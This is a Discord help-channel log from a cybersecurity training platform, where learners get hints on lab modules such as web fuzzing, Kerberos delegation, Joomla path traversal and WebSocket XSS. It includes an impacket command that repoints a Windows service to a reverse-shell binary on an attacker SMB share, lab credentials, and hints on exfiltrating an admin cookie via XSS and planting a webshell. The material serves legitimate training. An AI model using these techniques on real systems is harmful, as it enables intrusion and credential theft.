#modules

On the MS01 target, trying to access DC01 from there

👍

The callback ip I don't think is 172.16.1.10

Oh, that's the callback IP — forgot about that. Alright, trying again.

Check your ipconfig to be sure

Hey im trying to solve bypassing encoded references section from web attacks module in this try to download contracts of employes to get the flag when i capture the request i get a url encoded base64 value

I am trying to fuzz to 1 to 20 by doinh the same convert to base64 then to encodeurl

I dont seem to be getting the flag

Make sure you use the right request method :)

i am running it as admin.
Is the HTB host not open to installing PSGallery modules?

I tried post changed from get

Your request should mimic the request you intercepted

.m

Not much more I can say about it tbh

https://academy.hackthebox.com/module/54/section/483
for this section i do same with the command from this module but when i got the flag why i got wrong flag?

Yeah, the problem was that I was making the mistake of putting the DC01 IP in as the listener IP — need to get out of that habit.

Refrain from posting things that may contain flags for other sections

ok

Don't limit the recursion depth

but i already got the flag

@fathom pendant I went back and tried again on the web fuzzing skill assessment and got it finally haha, thank you for your guidance. 🙂

why i cannot use it to answer the question?

Because the one you showed isn't the answer

or you have some space before the answer or is not the answer

Don't forget to fuzz for extension

That wasn't the issue

so i just remove the recursion depth?

The answer he got was for the previous section

to remove the limit

You don't have to, from what I'm seeing

so the issue is not that is not the answer?

Yes

The screenshot he showed was the answer for the previous section

So. Not the right answer

lol thats what i said

¯_(ツ)_/¯

recursion-depth 1 is this true?

You can keep it or not

It won't make much of a difference

I didn't from what I recall

No thankyou got it im an idiot i didnt see that obvious mistake i was making

:)

Not an idiot, just learning

so i just need to wait until the fuzzing done?

one big question

Yes

Just be patient

One small answer

what's this server about

fr

about hackthebox

If only there was some sort of #welcome channel

oh shi

my bad 💀

It's ok, most people can't read

bruh

:(

You think I'm joking

But there's plenty of people that pop in and ask for something blatantly illegal

i have 0 knowledge about computer programming

Programming knowledge isn't required tbh

wait fr

HTB academy is a good start

LESGOOOOO

It helps

But it's not required

what about languages

Most things that deal with code basically tell you what to do

oh

Bash,php,js are the big ones

uh

ok 👍 💀

ok so

https://academy.hackthebox.com/login All tier 0 modules are free, they will introduce you to cybersecurity quite well

where do i start if im into cybersecurity

And the thing with the snake.
It has often saved my life

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

SORRY I DIDNT MEAN TO TYPE THAT

I'm working on creating some python scripts to start/stop/reset/terminate targets it's actually very simple, the endpoint solely uses the section number

i've heard python is easy

Yeah, Python is really cool

yea it is really easy and simple

Got one that allows me to change vpn region, just need to update it with my session cookie and xsrf token

Well... no.

and one more thing

maths 💀

how complex does it get

Math's isn't required for programming

Or cybersecurity

coding?

Programming == coding

oh

You only need math if your code is using math

¯_(ツ)_/¯

khan academy

basically i'm really interested in cyber security so i just needed some basic info

frfr

goated

The beginners Bible linked earlier is a good start my guy

thanks guys

girl*

The academy has an information Security Foundations path

im trolling so bad

I'm using my guy as a general term

Not gender specific

no im jk

Like he's a dude, she's a dude, we're all dudes

https://tenor.com/view/good-burger-kel-mitchell-ed-im-a-dude-hes-a-dude-gif-4322957

chill it was jok

💀

can anyone help me with this:
Image
is this the nibbles initial foothold walthrough module, this command is supposed to give me a reverse shell after executing this
ive also tried pwd as id and it still doesnt work

It's bc it's not calling to the right place

It needs to call to your ip/listener

not my target?

Correct

How does it know to call you?

ah

ok ty

Think of nc as a phone dialer

When you open a call, is there an acceptance to call or not?

Who's on the Windows fundamentals module?

Just ask your question:)

Im doing the module and stuck on the 3rd question...

https://tenor.com/view/discord-gif-22897697

https://dontasktoask.com

What is the section name?

Is there a way to exploit? Sudo vers

Hi

Metasploit has a few modules on it if you search sudo

You gotta be willing to search for answers

Not just run to the discord to do your research for you

Do you know a good one?

Depends on the sudo version

¯_(ツ)_/¯

1.8.31

Brother

I implore you

I have sessions for target

do it yourself

search sudo 1.8

See what that turns up in msfconsole

hey everyone
needed some help with the Post-Exploitation Persistence part in Attacking Enterprise Networks

Hey boys

The module itself is the guide

I made a diss track on tryhackme

https://tenor.com/view/we-dont-care-gif-18146171

i am trying to do it blind

Damn it got removed 😂

Well blind includes not asking others for help

Because it's unrelated to htb

And academy

But im in the off topic chat

No... you're not

Oh wait

a slight help

Your right, my bad 😂

Read and follow #welcome

I haven't done the module yet

So I can't help you

lol thanks

I can’t access the off topic

.

oh nvm i figured it out

Are any of you students registered on academy?

Yes

This isn't an idle chatter channel

Well I can’t access any other channels 😎

If you want access to #general . Read. And. Follow. #welcome

There's explicit instructions there :)

💀

That’s all I gotta say

I mean you can say that. But I'm telling you how to access other channels

If you can't read, that's not my problem

No your not telling me how to do anything, you’re directing me to the welcome channel that has instructions 💀

Yes

Listen im not trying to be rude

Which tells you how to verify, and access other channels

Sorry that I'm not copy/pasting the instructions here your highness, didn't realize I had to cater to you

Woah there, now that’s a bit toxic.

Let’s stop this conversation 🙂

Pass-the-Ticket section of the Password Attacks module is taking 10 minutes and counting to spawn the target.

US-West-5 which has "Low Load" attached to it, so I'm not sure if it's the VPN connection that's the problem.

The vpn servers don't have a location tied to them

Pwnbox does

But the vpn servers are (US|EU)-academy-{1..6}

Well the PwnBox I'm connected to is 25ms which is better than all the others. Switching to US-6 to see if that makes a difference.

Nope. Still says spawning and it's now been 15 minutes

Pwnbox region and vpn region are separate

Aware of that. But again, still doesn't do anything to solve the hang at "Targets are spawning"

Change vpn regions, you'll likely need to restart the pwnbox

Update: finally spawned after nearly 20 minutes

Hey, question regarding
Module: Kerberos Attacks-Unconstrained Delegation - Users
"callum.dixon:C@lluMDIXON has Unconstrained Delegation set and carole.rose:jasmine has genericwrite over callum.dixon. Using this information, try to compromise the domain and read the content of C:\flag.txt on DC01."

Can anyone provide some info regarding that ?

@fathom pendant Is there another way for me to exploit Sudo?

The using metasploit module yes? All answers are in metasploit

Yes

I don't know why exploitation is not exploited

Did you set the session, lhost, lport?

You'll need to change lport from default

Yea

Nothing

¯_(ツ)_/¯

What is the error it's giving

But no session was created

Did you try all the available exploits?

I sent you a private picture

I didn't consent to dm :))

Come on just once please pro ❤️🙄

Alternatively just reset the target and try again

I don't make exceptions

@keen jolt is a scammer don't trust him

Okay, as you want

take it to a mod/admin

How do I do that bro

see on the side (if on desktop) the people under Administrator/Moderator --> go to them

Did you see the picture?

I'm still in root password

I didn't understand how to get a root password

you don't need a root password

Lab It requires

??

the section you're working on does not require a sudo password

lmao

literally just spun up a target and performed the necessary steps

no pw required

Examine the target using the credentials from the user Will and find out the password of the "root" user. Then, submit the password as the answer.

OH

I thought you were doing the metasploit module

not the password attacks module

:)

:)))

see what happens when you don't communicate what module and section you're on?

Information Gathering - Web Edition skills assesment question 3 for the API key, I've found the h1dd3n admin directory, but the page won't load and all of my recons that I tried just give an error, anything i'm missing?

you need to use another person's login to find information; one of the tools in the module is useful

add a / to the end?

or don't

Sorry

:) in this case Sudo Might not be vulnerable for the password attacks module

I entered shh and metasploit

you don't need metasploit for this

check will's history if i recall correctly

sometimes for whatever reason in browsers it tries to auto-upgrade and drop the port

but you can usually get it with curl

How

what command in linux can be used to check history

:))))))))

with curl i get moved permanently

-L to follow redirects

nevermind it is the / that made the difference!

yeah

thank you!

it's a bit of a tricky bitch imo

all those hours searching just for a / ;D

Find

you have will's credentials, first ssh in

this is basic linux dude

find doesn't display history

it just finds files on the system

Yes

ah ok

since you apparently don't know how to frame your question:
you're on the passwd, shadow, & opasswd section

in which case my hint here is actually... just look in will's home

The problem is that I want to open the shadow file, I can't

dude

Nothing

did you list ALL

:)

just doing ls or ls -l doesn't show hidden files or directories

ah now i remember... we were literally guiding you to this like yesterday

and told you to ignore sudo and /etc/

don't focus on that

the questions in this module are generally giving you the end goal

What should I do?

adm

when you ssh in

do not cd anywhere

just look directly where you are

you need to list all files in home

Kira / sam / will

i meant will's home

🤦

I know in home will there

Kira sam will

https://tenor.com/view/stocks-crash-never-north-always-macedonia-okay-gif-14805208

look. at. will's. home

that's all

that will lead you forward

Nothing

trust me there's something

it might be hidden

but there's something

and if you don't know how to list hidden files in linux at this point i really can't help you

Ok

ls --help

maybe that's useful

Ok thanks bro

https://tenor.com/view/ferret-running-away-aphearse-gif-25030514

gotta ferret around those commands, learn their ins and outs

I found the solution

good now you have the next step forward

you have a lot of patience

i worked helldesk

:)))) the amount of stupid there pales in comparison

at least he knows how to type things

:)

Somewhere along the way I lost a great deal of my ability to not exhibit frustration with support issues.

Oh no

This man needs OTW stat

Does anyone else sometimes forget the previous module yea I have my notes and stuff but I still forget like small configs

Guys, I was hacked, can anyone help me please?

If it concerns any account, please contact the support of the respective provider

It is the typical excuse when they want to access a restricted account without permission+

okay I feel like i'm crazy but, what?

is that not the same exact payload it just said failed? (the payload does work)

It happens

looking at the logs it looks like the one that failed had ) as a prefix and the successful one had none; but why doesn't it test for no prefix before saying it failed??

fair enough, honestly

What is the best hack that anti cheats don't detect for box pvp?

(minecraft)

...

I can't use the general channe

l

I don’t think this is the right server for that question

oh sorry, I just googled minecraft cheats and this server came up :c

huh

odd

Do you know of any servers that are dedicated to Minecraft hacks?

I don’t, sorry

and i’d be careful where you ask around about cheating

if you wanna learn cybersecurity you can stick around though /hj

1 that's illegal 2 read #rules 3 cringe if you need hacks to win

im doing the aen ansd im lost on how to run the ttimmons part it keeps failing and i am admin

this fails

did you laod powerview module ?

Please refrain from spoiling the module

Consider any aspect that has to be discovered a spoiler, including passwords

srry i just dont know how to tell you enough info

ahhh i see mybad

While yes the module is a guide itself, most people do it blind meaning they don't even look at the module at all

No questions or outside help

The errors generally provide you with enough information to identify the issue and troubleshoot.

this is literally going nowhere

it ask for pass then it doesnt do anyting

Well I'm assuming you're providing a password, and you ensured the right password was on the clipboard

yes

but also i tried all thrree ips

.20 .3 and .50

none work

If you're really hitting a wall and need help to move forward, just read the module up to where you're stuck

i am but i have done it to the t

Otherwise potentially reset the lab environment and see if maybe something wasn't loaded properly

As stated AEN itself is the walkthrough

So if you're struggling following it either your lab is bugged or you're doing something wrong

#Module: ADCS Attacks
#Section: ESC3
#Subsection: ESC3 Abuse Requirements

Not having any issues yet. Just trying to understand the "schema" version of certificate templates. In the subsection condition 2, it refers to an "Application Policy Issuance Requirement" for the target template. But I'm not finding much information that elaborates. How exactly would we verify if a template meets this requirement via server manager or LDAP without simple checking the schema version number? I hope this makes sense.

can certipy/certify do it? certify template /show?

it might be something like certify find /showallpermissions

iirc certify.exe find

will mention that

yeah that's for listing the templates

I'm working on the skills assessment for web fuzzing. One of the questions is to discover the full page URL for a website that says "You don't have access!"

I am positive I have the URL but can't get the answer. It keeps telling me I'm wrong. Anyone else run into this issue?

yea its the same thing after reseting the target

i just looked, cetify find sees the schema version

plus you can just use /vulnerable and it'll find it for you

then i do the ps credentialing and when i use get psn.py it fails to do anything

replace the port with PORT

Tried that too. Also tried without the port

make sure you have no spaces

Checked and no spaces lol 😞

can you dm me what you’re entering?
(is this allowed? i’ve completed the module)

Literally use the word PORT

Instead of the port number

🤦‍♂️

:)))))))

Thank you that worked lol

If you want you can DM and I'll look at what you got.

damn I need to be more clear

Nah tbh that's a bit of a tricky thing to convey

also would this be? it does feel iffy since I could lie about that

I don't think it's an issue since it is just a learning module not a new box with no write-ups

there’s still a rule about not spoiling modules though

Hmm I'm not sure then. I'd hope it's fine since I'm just trying to confirm the formatting of the answer? 😬

It's a bit of a trust thing

Dms are kinda Grey area as you don't know if the person has/hasn't passed it

It's mostly public where it's frowned upon

all depends on what staff is active, some allow it/do it themselves and some say you can't do it at all

which totally clears it up

alright

i’ll just be honest about it and stop if i’m asked

believe it or not, straight to jail

;-;

https://tenor.com/view/jail-right-to-jail-right-away-parks-and-recreation-parks-and-rec-gif-16177531

In general. The best practice is to obfuscate as much as possible while still conveying your question

I.e. the A* user, or password p*

Or in some cases password A1..H8

With the first and last 2 characters

Other ways is if you obtained a file; md5sum

what section? need more info.

try adding the ip (without the port) to your hosts file and run the scan with the domain name

Can anyone help me with introduction to metasploit

Im on the payload section

I used this exploit(multi/http/apache_druid_cve_2023_25194)

index.php isn't the endpoint. Utilize all fuzzing techniques to discover the right file you'd pass parameters to

Web fuzzing skill assessment, it doesn't give a base domain to start with

ah okay.

In this case the right endpoint will explicitly tell you what the parameter is it wants you to fuzz when you visit it

Just need a sanity check

Literally every stop along the way in this assessment tells you where next

Genuinely don't recall the exploit used, but I believe the module is older than 2023

Aight cause search "apache_druid"

Don't use underscores, if that was the only one that popped up

Consider each bit a keyword

Aight2

There is an older expected exploit to use

You have to always bear in mind that module information regarding msfconsole may change due to new exploits being discovered since the module came out

Cause msf says its vulnerable

Yeah but the expected exploit to use is older

Yours is marked 2023

Also just bc it says it's vulnerable doesn't necessarily mean it is

Thx

so you gotta find the domain first?

For the web fuzzing skill assessment? No

The first step is finding the right endpoint to give up the domain

The assessment tests you on practically everything taught in the module

From extension fuzzing to subdomain fuzzing and recursion

Each successful step along the way will give you breadcrumbs to the next

How am i so bad at this😭

Extension fuzzing is your friend

You're in the right directory

I pwned axlle with almost no help but i cant even use msf🥲

search apache druid

Yeah i got it

One of the results should be r..

Thx btw

got it, thanks for the help 🙂

Because it has nothing to do with any skill so to speak

Just usage of a tool

At this point whenever you curl or visit any pages you find you will be given a breadcrumb to the next fuzzing objective

Hii

Is htb coupon codes buying option available to redeem for later uses?

so i found a vhost, but im getting this : Unable to validate base domain: (not exposing the vhost) (lookup vhost on 1.1.1.1:53: no such host)

Did you add it to your /etc/hosts file?

And did you look at it via http://domain:port/

http://domain:port/ add like this to the /etc/hosts?

No

Only the ip and domain (vhost you found) go in the hosts file

Protocol and ports don't go in the hosts file, as the hosts file is just a local dns

Hello, I been spawning a target on HTB Acaedmy for like over 5 mins now and it still not finish, is there a way to fix this?

after like 5 hours just finished it, thanks for your tips :))

Change vpn regions

Pray

Np I'm glad the breadcrumbs lead you to victory

https://tenor.com/view/victory-gif-23899955

The target question not the pwnbox

I know what I said

Vpn region != pwnbox region

Where to change it

oh i found it

Hello guys - https://academy.hackthebox.com/module/147/section/1335

I tried few CVEs per linpeas but nothing is working. Just want to try cracking id_rsa from the same user. But the permission to view is not available - -rw------- need help on transferring to my host. Tried few file transfer methods, its throwing permission denied as expected.

thank you

Don't need any cves, just a lesson in history

Also you don't need to crack anything either

Also that permission set you showed shows that the owner of the file can read

but there is no bashrc_history for Dennis user

Also fun fact, the owner of a file on standard Linux installs always has full control of a file

Well bashrc_history isn't a thing

ohh okay...

Also there's a command simply called "history" you can use

I change the VPN server to US Academy 1 and it sstill show target(s) are spawing

Refresh page after switching regions then try spawning again

I refresh page and it show that, no button to spawn

After refresh page it show
Fetching status -> Target(s) are spawning

Reach out to support then ig

¯_(ツ)_/¯

Green bubble on the bottom right of academy

Aight I try contact them thank you

oh it back now finally

Having the same problem. Seems to occur at night on the east coast. Only see targets are spawning and it sits there spinning. Tried changing vpn, relogging in - no good

Mine coming back after quite sometime

I think there are several of us having the same problem, we have to wait for support to help us

I don't understand it. they are creating ssh key and adding it to the auths list. but its for the same user which I already have the password to ssh into. What's there for root user from dennis history? (sorry for sounding dump).

Look closely at history

I'm in as root

Oh sorry I might have been looking at the wrong module somehow

no problem, thank you

I swear the link you shared opened somewhere else lmao

Anyway

I was thinking of the ez one not the med one

Deleting spoilerish info

ohh my bad

On the Web Attack Module, Advance File Disclosure section. It showing two attack method the CDATA and the error base. I some how get error base to work but the CDATA not work

Consider any info you have to find a spoiler

Not all techniques are possible

Ohh, I thought it can do both

This module is very much not everything you see is what you get

Also as a note, save the different dtds they have you make under different names

it’s just a file full of all the dumb aliases i’ve added and later removed

It's usually .bash_history is more what I meant

ik

just making a joke

Hi

yo

On forum I saw some people say they can make it work with CDATA, so trying to figure it out but still not working

Im on meterpreter section

And im stuck to find a working exploit for the machine

Its sayad existing exploit but ms17-010 didnt work

I got it work now, need some modfication to the payload T..T

Hi guys can someone give me free cubes or gift card for def sec analyst 🥹 I Wanna learn in advance .
I'm an HS student

You can sign up with a student email. Nobody here is going to give you stuff like this

Edu email

Our school don't have that .. 😬my school is poor

*says

Contact support, maybe they can work something out

or sub platinum plan for a month or 2 u can unlock alot of module with the cube from that plan

i’m dead stuck on sqlmap essentials - skills assessment. I genuinely can’t find a single parameter to be vulnerable, i’ve tried crawling and fuzzing in case i’m missing anything but nothing seems to have any functionality that would interact with a database; even search functions and forms seem to just dry reload the page on client side without doing anything

Try to find a working parameter and tune your attack

Also try to understand what kind of attack technique possibly going to be so you can reduce the time you going to spend on waiting

I'm not rich either.. I'm currently working freelance and part time .. that money I can't afford yet 🤧...

Can you guys give me a roadmap to path I wanted to take.. I want to learn def sec and offsec in dept but there is no free platform online ...

🙁

save your money at least 20-30$ a month you can get the platinum plan in 2-3 months after saving which going unlock a bunch of module from tier 0 to tier 2

you can grind back some cube after complete module too... also tier 0 is free

Edited: You can earned back the amount of cube you spend to unlock tier 0 after completing tier 0

Yeap can I make more cubes by grinding tier 0 or is their a limit you can save?

Tier 0 cost you like 10 cube as I remeber and you earn back 10 cubes. So you can learn all module in tier 0

for higher tier you gotta buy cube

My suggestion is save money from now and learn module in Tier 0, after you got some money for the platinum plan then go for higher

Owww 🥹😕

You don't go positive doing modules

Net neutral/negative

I dont want to learn everything that's outside the path I wanted tho

Yeap I see as well

Learn basic and foundation first

Aight thanks guys

Psexec should work

I already know server auditing and net security however what I'm lacking is penetration and exploitation since the best defense is to know the offense..

try to find a working parameter
I can’t for the life of me do that is the problem, I can’t find a single actually used parameter on the whole site

You may need to dig around for it, it's not immediately apparent

I know how to use tools but I don't want to be script kiddie all my life .. guess the only way is to save up

I checked every page I could find, had sqlmap crawl, and even did an ffuf scan for directories in case I had missed any

Open the network tab in devtools and click around until you find a post

There many techqnie like BEUSTQ, try to figure out which one is it, gonna be some help too

That tech isn't covered by the module :)

Everything for the skill exam is covered by the module

Including the techniques

I did it with the tech that time it save lot of time

It will be a bit of trial/error

I always recommend for the skill exams to stick with what's taught

Aight noted

Only dig deeper if what's taught isn't working

just went through everything I can find again, have checked with both devtools and burp, no posts to be found

Did you try placing an order or adding to cart?

yep and yep

:))

this gonna give a post request, check it with your burp

And you checked in the network tab yeah?

yep, that and burp

How didn’t u find it then?

I think something might be broken on my end cause neither of those even send requests at all

they just soft refresh the page

When you click add to cart do you get a popup saying "item added"?

Are u getting an alert?

nope

Try it for every item

nothing still, it just jumps me to the top of the page

But the "add to cart" button should send the request

Is burp capturing anything?

nope, nothing in burp and nothing in network

If not then ur not clicking the wrong thing

The literal button that says add to cart, none of the other buttons afaik

I did it a few hours ago

intercept the trafice forward it 1 by 1

No other buttons go through the server I’m pretty sure

Reset the lab

Try again

same deal

that’s my 3rd lab reset also

Try to hover over buttons that don’t forward to index.html

Can’t test it rn

what am I looking for with that?

The cart button shouldn’t take you to index.html afaik

It shouldn't

It should produce the popup that says "item added!!!"

Yeah try looking for a script in the html and it will probably show you which button it’s listening for.

I can get to cart.html through the cart button in the top right, which I assume isn’t what you mean (and doesn’t send any post(neither does the checkout button from there))

but yea, when I hover over the add to cart button it says it’s to index.html#

All items?

they shouldn't

yea, all of them do

it should be a dom call to shop.html# since its the button that executes the script

yeah spawned a fresh one and it's working as intended

okay there we go

I restarted it again and now the ones on shop.html are working; any add to cart on index.html is still broken though

those aren't broken

those ones are working as intended

the only buttons that work are on the shop page

:))

mmkay

the idea is that you're exploring a shop page for a vulnerability, and sometimes that vulnerability isn't readily apparent on the index page

you should always try all pages you can

I did try to check everything on every page, I think I just got thrown off since those two look like they should have identical functionality

good to keep in mind though, always assume the devs made it weird

yep

inspecting the elements of both pages you'll see the add on one page triggers an event, while it doesn't on the other page

alternatively consider the devs messed up when initially making the site :)

honestly I should’ve already been there given every experience i’ve ever had trying to develop with someone else

lmao

and tyyy

yeah inspecting the source code; the event tag isn't on the index page

:)

I just wanna say you’re really awesome for helping out in here so much

Hey..I am just a beginner in cybersecurity and want to learn linux how should I start
?or if anyone can help me with the roadmap or something...it would be helpful for me!

Yeah i used ms17 010 psexec still noting

if you want to learn the basics of linux there’s a “Linux Fundamentals” module

Did you set the user and password (as given just above the question?)

There is?!

No its the footage question

Autocorrect sorry

Can anyone help with NTLM Relay Attacks - Skills Assessment for BACKUP01? I think I'm using the right vector but I keep getting -] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type). Been stuck on this for several days now, running out of ideas. Have taken a look in the shares and found nothing interesting, nothing writable... Tried RCBD but unable to perform the attack... ntpdate does not fix this issue. Any ideas?

Thanks ...I will check it out

Yeah, its the first question

Hey when I try to lab on instance it’s not working properly

Need help with Widows Lateral Movement - SMB Section - 2nd question (the service ALG).

I have encountered the error attempting to get reverse shell :

`impacket-services INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 start -name ALG

[*] Starting service ALG
[-] SCMR SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND - The system cannot find the file specified.`

while, my reverse shell is located in the SMB share and the user Lich is successfully authenticated by SMB.

`impacket-services INLANEFREIGHT/helen:'RedRiot88'@172.20.0.52 config -name ALG

[*] Querying service config for ALG
TYPE : 16 - SERVICE_WIN32_OWN_PROCESS
START_TYPE : 3 - DEMAND START
ERROR_CONTROL : 0 - IGNORE
BINARY_PATH_NAME : \10.10.14.167\share\rshell-8080.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Application Layer Gateway Service
DEPENDENCIES : /
SERVICE_START_NAME: INLANEFREIGHT\Lich`

ll rshell-8080.exe -rwxrwxrwx 1 root root 48K Aug 30 01:06 rshell-8080.exe

Please, tell me what's wrong?

DM with to help you find a workaround

Does anyone know how or where i can find solo leveling arias hacks/cheats?
I am new here

Whatttt

no
wrong server
also that’s illegal

Do you have any suggestions for discord servers providing cheats for games😅 because i am totally new to discord stuff

I don’t, but my suggestion would probably be to either get gud or go play a game you can actually enjoy without cheating

This isn't the server for that

I suggest reading #welcome

Please don't include anything you had to Fuzz for in your question

But the Web Fuzzing skill assessment tests you on everything you were taught in that module

when the author mentions to unzip the alpine image, will any alpine image do ? Or it has to be a custom one from sone github ? I have done this before on machines and it was usually some github alpine image, but the author gives no detail in this regard

i really have no idea where they are getting this alpine.zip from

Hey yall, im currently doing the skill assessment for the information gathering-web edition module and im like hard stuck at a part which i think is a technical issue..? basically (spoiler for module) ||i found the web1337 vhost and read into the robots.txt where i found the admin dir, however whenever i try to access it it just seems down? like im unable to connect or perform any kind of thing with the subdomain so i cant get any info out of it. I cant use no tools as they wont connect either so im just not sure how to proceed from here||

You should delete this spoiler
And DM me

guys i know that is not the channel most appropriate, but what do you think abount develop and implement a SIEM system in CTFs attack and defense?

which error do you have?

for both the tools and the browser, it just says that it cannot establish a connection. im not sure if there is another way to obtain the API key in the admin dir without enumeration, but i cant seem to enumerate anythin without establishing a connection

is your vpn up?

with a low ping

vpn is up i can access the main domain

ok, have you add the subdomain in your host file?

yep

ok, so you are stucked on thrd flag, right?

mhm

ill restart my router or somethin man, because spoilers ||curling the domain didnt work, yes i made sure it wasnt https. the domain is in the hosts file||

im out of options at this point :p

i'm trying it, i'm respawning the target

no need, restarting my router did the job lol

thanks tho!

ah ok perfect

really weird though but things happen

Hello, I'm kind of stuck with the Web Attack Skill assessment, I gather the user but now I dont know where to go next

Hey guys I Need help

we need the problem to gives you help

Ywa sorry So I am currently doing Ad Enumiration And Exploiting Module I am in credential Harvesting Part Of Linux and stuck in question 2 here it goes

The Number Cannot be made in decimal but still I tried every output I could Think Off

Also Tried giving in hex and everything

have you tried with cmdlet Get-ADGroupMember?

Hey.... Perhaps some contributor or staff can point me out to the direction here.
I think there is some kind of malformation in the Cheat Sheet Generation script for the Blind SQL Injection Module.

It generates the content way too small compared to the other modules and unformatted.

the user forend is part of this group?

Yes Local Admin

maybe can be the others member at exclusion of your user, so 9

Didnt worked

No! That's the answer

But its not working

Try removing any message that would give a direct answer in this channel

Does it have any space while imputing?

Oh Okay I didnt know about that rule sorry

No

Its a 10 I have tried 10.0, 0.10 And 0x10 also

Yws Didnt worked

Mine is green here with that value

Wait I got it

There was one space

Told ya

Thanks a lot man that one space wasted a lot of time

And thier hint even confused me more

How would ya'll differentiate between Discovery, Footprinting, and Enumeration?

Discovery As very basic Footprinting as little bit more like using nmap to scan for open ports and enumiration likw gathwring user information or findinf flaws when we are in network. NOT Sure But I Think Soo

hi guys

im stuck in this question in the joomla attack section in the ATTACKING COMMON APPLICATION Module This is the question ( Leverage the directory traversal vulnerability to find a flag in the web root of the http://dev.inlanefreight.local/ Joomla application ) and i used the script to list the directory but i cant read the content of them so i cant read the flag

I need help if possible

have you tried going there in your browser

but the question asks you explicitly the content of the flag? because this flag file has a strange name so it can be the flag

if it is please remove the spoiler

its not

i just tried even with HTB{}

open the file in your browser, you already know the file name

the name is also a spoiler btw, pls remove it

i will try it

im not sure i dont know where to find it

you have the directory and the file name, search them in browser

you tried read the flag ?

you did the webshell right ?

don't forget to replace spaces with +

you also need to have the correct path to your file to request it from the server URL/goodpath/file?param=cmd+.../

it's not a webshell, just path transversal

simply http://sever.com/flag.txt

yes but for the pathtransversal it must first be the webshell ( which it modifies in the protostar templates )

personaly this is how I found the flag

i'm confused

Are you at the joomla attack section?

yes

wow it did work Thanks

and thanks everyone for the help

I followed the course I went in the template protostart I added my webshell in the page error.php then I saved it

and then I did this :

ah ok you have followed another way

FootPrinting module, medium lab Enumerate the server carefully and find the username "HTB" and its password. Then, submit this user's password as the answer. i got the || alex and sa (system administrator) with credential as well but following the hint its probably the mssql id,pass. tried, did not work. || any hint would be fine.

no i just followed the course lol

@fathom pendant could you help with this

what is the link ?

no alex is no cred for mssql it's credential for an other protocol

Guys can anyone help me

you can connect to alex with several windows protocols

i guess ||rdp||

yes

Just ask you question here.
But first, read #rules

Okay

Can I dm you?

the credentials from ||important.txt|| is not working in ||rdp||

Try an important user

Perhaps a powerful one you'll find in all Windows installs

If you can't ask here the assumption will be that it's illegal

Oh okay, sorry

That's not a windows account name

Maybe when you sign into the system check c:\users

okay, let me try

Heya, i'm newbie here

Somehow I can't change my nickname to ascii letters on this server

Just read and follow #welcome to link your htb account

Thanks!

I was saying that alex was useful for the rdp and not the credentials in the important file. 🙂

??? The important file is still important

You can use those creds

yesss I didn't say otherwise ahaha but not for rdp

Yes for rdp

Maybe not the username but the pw

Module: Attacking Common Applications
Section: WordPress - Discovery & Enumeration
Link to section: https://academy.hackthebox.com/module/113/section/1100

Find the version number of this plugin. (i.e., 4.5.2)

Been on this question a while, so I thought I'd ask. I've solved the prior questions. I've read the hint but hasn't really helped. This is what I've tried:

• I've tried reading the source code of where this plugin is mentioned.
• I've tried wpscan.
• Since directory listing is enabled, I tried checking the directory (/wp-content/plugins/<plugin-name>/) and there's no listing.

aah wait maybe I'm talking nonsense here

Are you looking at blog.inlanefreight.local?

Yes

And since you're on q3, you've answered q2

Did you see if there's a readme.txt there?

In the directory for the plugin they're referring to?

Yes

:)

When I tried navigating to the directory, there's no listings of files.

I didn't say in the directory listing

I just said did you look for a readme.txt

Like anywhere on the site?

No.

In that directory

As in did you try just throwing it on there

And just seeing

i had found the cred on alex and then i had been able to launch the application thanks to that i had not used the creds in important.txt for the rdp

As most plug-ins and such come with a readme

Yes... you can rdp with alex

I did not... I see.

I see. Thanks.

Has anyone here completed the 'Exploiting XSS via WebSockets' in the 'Modern Web Exploitation Techniques' module on HTB Academy? I received a hint: 'The admin uses a firewall that prevents you from exfiltrating the cookie directly.' I've tried other JavaScript commands like alert or document.documentURI, which work normally, but document.cookie seems to be blocked. I've tried jsf*ck, adding timing to the command, URL encoding, unicode escape sequences, ... but none of them worked.

You can also rdp with the other user

okay 🙂

I'll try again always good to know

document.cookie is not blocked, you'll just need to find a way to use xss to send it. read the source code provided to find which function you can use

Hmm i've tried /userws and /adminws but don't work

@grand portal if you want to test the theory out yourself go spin it up and see

you'll need to find the right payload

again read the source code provided to find which function you can use

im finished testing my theories, i || i used rdp to open windows, now can't get the mssql server credentials working||

I mean if you use the right account. It will work

is there any other account other than ||alex, sa ?||

C:\users

A glaringly obvious account

this tip slipped through my mind. let me check

i tried that obvious account, with the creds i found importantly, still not working,

Did you try with just the password?

Not the first part

username:password

yes i know, : seperates them, i carefully used them, by default when i open ssms, it was automatically set at that username, i tried that as well

Did you rdp with other user

Otherwise you need to run as

i did rdp with alex user

wait

i got a theroy, let me try

ftp doesn't even exist on the IP address

i even put the ftp port in as normal

"attacking common services" is the module

Terminate then start the target again

I tried that aswell

The question here implies ftp is running on a non-standard port btw

so port 21?

Try removing the min-rate and see

yeah sure

Port 21 is standard

chance it skipped the port with min-rate

As said, the question implies not standard

got it

rescanning right now

I really need a linux server nmap takes so long my wifi sucks

Try also using -sT instead of -sS

thank you

but in the real world isnt -sS less detectable because it doesnt rly establish a full tcp connection?

Sometimes that can appear more suspicious

Not to mention you're already still sending the ICMP ping anyway

that is true

hi

i did rdp as other user using important creds. still not able to login in ssms

Just use windows login

it worked- why is that?

Because that's how it's set up

hi

the same creds used for rdp, is being used with windwos login. right?

https://learn.microsoft.com/en-us/sql/relational-databases/security/choose-an-authentication-mode?view=sql-server-ver16

Hello, for the question "Introduction to Web Applications - HTML Injection ", what is the attended slogan ? I tried Your Cyber Performance Center but it is wrong. Any idea ?

i'm new here and i want to follow the bug hunter roadmap. where should i start?
i know this topics already:
1- Python
2- Go
3- linux essential

hello 🫡 , I am new in the community!

not able to find user 'htb'

try ssh username@target_ip

e.g., ssh htb-student@10.129.254.254

Try re-phrase and put your question properly.

im not able to login using mssqlclient.py i though i'd use query to find out user. To same server. in the gui version, we used the same credential, any suggestion?

Can you give me some hint? I've searched thoroughly in the source code but still haven't found it

there's a socket function in the code

combine it with standard xss payload

document.documentURI worked,but document.cookie don't work:(

Looking for some help installing any distro using WSL.

1. I've successfully installed and verified I have WSL2 as default.
2. I've successfully downloaded Ubuntu 24.04 LTS from the Windows Store.
